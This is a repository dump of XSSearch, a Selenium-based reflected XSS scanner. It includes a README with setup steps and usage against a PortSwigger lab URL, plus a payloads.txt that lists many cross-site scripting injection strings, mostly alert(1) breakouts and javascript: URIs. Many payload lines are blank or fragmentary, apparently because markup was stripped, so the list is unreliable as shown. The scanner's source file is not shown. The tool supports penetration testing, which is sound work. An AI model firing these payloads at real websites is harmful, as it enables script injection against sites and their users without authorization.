├── Images ├── Banner.PNG ├── xssearch.PNG └── xssearch_warnings.PNG ├── LICENSE ├── README.md ├── payloads.txt └── xssearch.py /Images/Banner.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Encryptor-Sec/XSSearch/5e8c29d6c67c6d10f1b04813febe8ac66173df9e/Images/Banner.PNG -------------------------------------------------------------------------------- /Images/xssearch.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Encryptor-Sec/XSSearch/5e8c29d6c67c6d10f1b04813febe8ac66173df9e/Images/xssearch.PNG -------------------------------------------------------------------------------- /Images/xssearch_warnings.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Encryptor-Sec/XSSearch/5e8c29d6c67c6d10f1b04813febe8ac66173df9e/Images/xssearch_warnings.PNG -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Sathyaprakash Sahoo 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # XSSearch 2 | ##### _A Comprehensive Reflected XSS Scanner_ 3 |

4 | 5 |

6 | 7 |

8 | 9 | 10 | 11 |
12 | 13 | 14 |

15 |

16 |

XSSearch is a comprehensive reflected XSS tool with 3000+ Payloads for automating XSS attacks and validating XSS endpoints.

17 |

18 | 19 | *** 20 | >#### DISCLAIMER : 21 | 22 | The XSSearch developer will not be held liable if the tool is used with harmful or criminal intent. Please use at your own risk. :) 23 | 24 | **** 25 | >#### USES : 26 | - XSSearch can be used to discover reflected Cross Site Scripting (XSS) vulnerabilities 27 | - XSSearch is capable of validating XSS payloads. 28 | - XSSearch will facilitate in the automation of brute - force attack for the verification of reflected XSS. 29 | - Works on all Linux environment 30 | - This can also be used in penetration testing to evaluate sanitization strength. 31 | *** 32 | >#### FEATURES : 33 | - Contains more than 3000 payloads for XSS validation 34 | - Works on selenium framework & ChromeDriver 35 | - It is faster than other XSS tools since the code is very light and rapid. 36 | - The code and payloads can be modified according to the situation. 37 | *** 38 | >#### SETUP & INSTALLATION 39 | XSSearch requires Selenium, ChromeDriver and Python to work smoothly on your system. 40 | 41 | **Installing Selenium** 42 | ``` 43 | $ sudo apt update 44 | $ pip3 install selenium 45 | ``` 46 | **Installing Chrome Browser for Linux (Skip this if you already have Chrome browser on your Linux)** 47 | ```` 48 | $ wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb 49 | $ sudo apt install ./google-chrome-stable_current_amd64.deb 50 | ```` 51 | **You may use the command to start Chrome from your terminal.** 52 | ``` 53 | $ google-chrome --no-sandbox 54 | ``` 55 | **Downloading ChromeDriver** 56 | 57 | Go to https://chromedriver.chromium.org/downloads and get the linux 64 zipped version of ChromeDriver 80.0.3987.106. 58 | 59 | Unzip the zip file. There will be a file for ChromeDriver. Open terminal on the same location and use the following command. 60 | ```` 61 | $ sudo chmod +x chromedriver 62 | $ sudo mv -f chromedriver /usr/bin/chromedriver 63 | ```` 64 | *** 65 | >#### USAGE 66 | XSSearch is a command line tool that uses a single command line instruction for simple and speedy execution.
67 | **Note** : This tool will only work on url which has a input paramter in the url. Example : www[.]target[.]com/?xyz= 68 | ``` 69 | $ python3 xssearch.py -u url.com/?s={xss} -p payloads.txt 70 | ``` 71 | **Arguments :**
72 | **-u** : It is required for URL input
73 | **-p** : It is required for Payload file input
74 | **{xss}** : It is a placeholder that the user should append after an equal to sign (=) in the url argument. 75 | 76 | **Live Usage** 77 | ```` 78 | $ python3 xssearch.py -u https://ac121f0e1eb31ae5c0c9473f00f400f7.web-security-academy.net/?search={xss} -p payloads.txt 79 | ```` 80 |

81 | 82 |

83 | 84 | Above is the screenshot of the tool with live example.
85 | _Valid XSS exploits are marked with red alerts.
86 | Invalid XSS exploits are marked with blue alerts._ 87 | 88 | **Errors & Warnings**
89 | The following are some errors that might arise as a result of an incomplete command, not specifying arguments or not specifying placeholders.
90 | 91 | Use the below command to get help 92 | ```` 93 | $ python3 xssearch.py -h 94 | ```` 95 |

96 | 97 |

98 | 99 | *** 100 | #### LICENSE 101 | [MIT-License](LICENSE) 102 | *** 103 | #### More suggestions and contributions are highly appreciated to make this tool better :) 104 | ### _STAY SAFE, ACT SMART_ 105 | ### Hit Me Up 106 | [![Twitter ](https://img.shields.io/badge/twitter-%231DA1F2.svg?&style=for-the-badge&logo=twitter&logoColor=white)](https://twitter.com/_encryptor_) 107 | [![Instagram](https://img.shields.io/badge/instagram-%23E4405F.svg?&style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/xhackerboyy) 108 | [![LinkedIn](https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white)](https://www.linkedin.com/in/sathyaprakashsahoo) 109 | [![Website](https://img.shields.io/badge/Website-FF5722?style=for-the-badge&logo=blogger&logoColor=white)](https://www.cyberbuddy.co.in) 110 | 111 | -------------------------------------------------------------------------------- /payloads.txt: -------------------------------------------------------------------------------- 1 | sample text 2 |

6 | 7 | ‘; alert(1); 8 | ‘)alert(1);// 9 | javascript:alert(1); 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | '> 18 | 19 | 20 | 21 | '; alert(1); 22 | ')alert(1);// 23 | 24 |

25 |

26 |

27 |

28 |

29 | 30 | 31 | 162 | 163 |

168 | 169 | 170 |

click
 171 | 
 172 |

173 | 189 | 190 | 195 |

--!> 204 | 205 | 206 |

x 207 | 208 | ">

209 | 210 |